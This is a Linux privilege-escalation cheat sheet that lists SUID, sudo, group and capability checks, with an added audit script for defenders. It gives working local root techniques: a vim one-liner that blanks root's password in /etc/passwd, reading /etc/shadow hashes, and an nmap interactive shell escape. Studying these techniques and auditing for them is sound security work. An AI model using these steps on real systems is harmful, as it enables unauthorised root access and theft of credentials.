Permissions Abuse

SUID Permissions

SUID (Set User ID) allows a program to run with the privileges of the program's owner, often root. It's commonly used for privileged tasks but can be abused if misconfigured.

find / -type f -perm -4000 2>/dev/null

# If a SUID program is found (e.g., /usr/bin/passwd), inspect its owner and mode bits (the 's' in rwsr-xr-x)
ls -lah /usr/bin/passwd

# Run the SUID program with elevated privileges
/usr/bin/passwd

Sudo Permissions

Sudo permissions allow a user to run commands as another user, typically root. If a user has unrestricted sudo access or permission to run commands as root, they can easily escalate privileges.

sudo -l

# If you can run commands as root without a password
sudo <command> # Replace <command> with any command

# We can then try to abuse that command to get a root shell.

Privileged Groups

Privileged groups like adm or sudo provide access to sensitive files and system operations. Users in these groups may have elevated access to system logs or the ability to perform admin tasks.

groups

# If you're in a privileged group (e.g., adm)
# You might have access to logs or other sensitive files
cat /var/log/syslog

# /etc/shadow (password hashes) is normally readable only by root or the shadow group; with sudo rights:
sudo cat /etc/shadow

# Summary report of TTY keystroke events recorded by auditd (needs read access to the audit logs)
aureport --tty | less

Capabilities

Capabilities are fine-grained privileges attached to executables that allow them to perform specific tasks without needing full root access. These can be abused if an executable with elevated capabilities is accessible.

getcap -r / 2>/dev/null

# Output shows the binary has 'cap_dac_override' capability
/usr/bin/vim.basic cap_dac_override=eip

## We have 2 options:
# 1. Interactive Mode
/usr/bin/vim.basic /etc/passwd ## remove 'x' to skip password prompt
# 2. Non-Interactive Mode
echo -e ':%s/^root:[^:]*:/root::/\nwq!' | /usr/bin/vim.basic -es /etc/passwd

# The 'x' is removed from the root user's entry, meaning no password is required
# We can now log in as root without a password (note: sshd refuses empty passwords unless PermitEmptyPasswords is set to yes)
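The SUID and capability checks above, turned into a small audit helper a defender can run against a host: it reports SUID files that are not on a baseline allowlist and file capabilities that are effectively root (the vim.basic finding above is one). This is an added example, not part of the original notes; the RISKY_CAPS set, the allowlist format (one absolute path per line) and the script name are assumptions.

```shell
#!/bin/sh
# Added audit helper (not from the original notes).
# Usage: sh audit.sh /            -> classify every file capability on the host (needs getcap)
#        sh audit.sh / allow.txt  -> also compare SUID files against a baseline allowlist
# The RISKY_CAPS set and the allowlist format are assumptions made for this example.

# Capabilities that let an arbitrary binary bypass file permissions or become root outright.
RISKY_CAPS="cap_dac_override cap_dac_read_search cap_setuid cap_setgid cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner"

# classify_cap_line LINE: prints RISKY/ok plus the line; returns 0 when risky, 1 otherwise.
# Handles both getcap output styles:
#   "/usr/bin/vim.basic cap_dac_override=eip"    (libcap 2.41 and later)
#   "/usr/bin/vim.basic = cap_dac_override+eip"  (older libcap)
classify_cap_line() {
    caps=$(printf '%s\n' "$1" | grep -o 'cap_[a-z_]*' || true)
    for c in $caps; do
        case " $RISKY_CAPS " in
            *" $c "*) printf 'RISKY %s\n' "$1"; return 0 ;;
        esac
    done
    printf 'ok    %s\n' "$1"
    return 1
}

# audit_suid DIR ALLOWLIST: prints SUID files under DIR that are not listed in ALLOWLIST;
# returns 0 when the baseline is clean, 1 when something unexpected carries the SUID bit.
audit_suid() {
    unexpected=$(find "$1" -type f -perm -4000 2>/dev/null | grep -vxF -f "$2" || true)
    [ -z "$unexpected" ] && return 0
    printf '%s\n' "$unexpected" | sed 's/^/UNEXPECTED SUID /'
    return 1
}

# Live mode, only when a root directory is given on the command line.
if [ $# -ge 1 ]; then
    getcap -r "$1" 2>/dev/null | while read -r line; do classify_cap_line "$line"; done
    if [ $# -ge 2 ]; then audit_suid "$1" "$2"; fi
fi
```

Run it from a trusted shell after a golden-image build to create the allowlist, then again on live hosts so that a newly appeared SUID file or a stray cap_dac_override shows up as a finding.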

GTFOBins - A Powerful Tool

GTFOBins is an essential resource for privilege escalation. It lists binaries that can be exploited in restricted shells or environments to escalate privileges or bypass restrictions.

https://gtfobins.github.io/

# For example, if you have access to a restricted shell
# Use nmap (if available) to escalate; interactive mode only exists in old nmap releases (roughly 2.02 to 5.21)
nmap --interactive
nmap> !sh

GTFOBins provides methods to exploit common binaries that are often overlooked during security assessments, giving attackers a powerful tool for privilege escalation.